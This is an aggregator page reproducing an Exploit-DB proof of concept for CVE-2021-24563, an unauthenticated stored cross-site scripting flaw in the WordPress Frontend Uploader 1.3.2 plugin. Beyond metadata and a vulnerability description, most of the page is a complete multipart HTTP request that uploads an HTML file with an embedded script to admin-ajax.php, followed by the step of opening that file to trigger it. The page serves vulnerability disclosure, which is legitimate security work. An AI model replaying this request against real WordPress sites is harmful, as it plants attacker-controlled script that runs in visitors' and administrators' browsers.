WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)

🗓️ 12 Jan 2022 00:00:00Reported by Veshraj GhimireType

exploitdb🔗 www.exploit-db.com👁 269 Views

WordPress Plugin Frontend Uploader 1.3.2 XSS vulnerabilit

Reporter	Title	Published	Views	Family All 14
0day.today	WordPress Frontend Uploader 1.3.2 Plugin - Stored Cross Site Scripting Vulnerability	12 Jan 202200:00	–	zdt
GithubExploit	Exploit for Cross-site Scripting in Frontend_Uploader_Project Frontend_Uploader	5 Oct 202106:21	–	githubexploit
Circl	CVE-2021-24563	11 Oct 202114:24	–	circl
CNNVD	WordPress 插件跨站脚本漏洞	11 Oct 202100:00	–	cnnvd
CVE	CVE-2021-24563	11 Oct 202110:45	–	cve
Cvelist	CVE-2021-24563 Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting	11 Oct 202110:45	–	cvelist
NVD	CVE-2021-24563	11 Oct 202111:15	–	nvd
OSV	CVE-2021-24563	11 Oct 202111:15	–	osv
Packet Storm	WordPress Frontend Uploader 1.3.2 Cross Site Scripting	12 Jan 202200:00	–	packetstorm
Patchstack	WordPress Frontend Uploader plugin <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability	21 Sep 202100:00	–	patchstack

# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
# Date: 10/01/2022
# Exploit Author: Veshraj Ghimire
# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
# Version: 1.3.2
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
# CVE :  CVE-2021-24563

# References:

https://www.youtube.com/watch?v=lfrLoHl4-Zs
https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1

# Description:

The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly


# Proof Of Concept:


POST /wp-admin/admin-ajax.php HTTP/1.1

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------124662954015823207281179831654

Content-Length: 1396

Connection: close

Upgrade-Insecure-Requests: 1


-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="post_ID"


1247

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="post_title"


test

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="post_content"


test

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="files[]"; filename="xss.html"

Content-Type: text/html


<script>alert(/XSS/)</script>

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="action"


upload_ugc

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="form_layout"


image

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="fu_nonce"


021fb612f9

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="_wp_http_referer"


/wordpress/frontend-uploader-form/

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="ff"


92b6cbfa6120e13ff1654e28cef2a271

-----------------------------124662954015823207281179831654

Content-Disposition: form-data; name="form_post_id"


1247

-----------------------------124662954015823207281179831654--



Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html

12 Jan 2022 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 24.3

CVSS 3.16.1

EPSS0.4059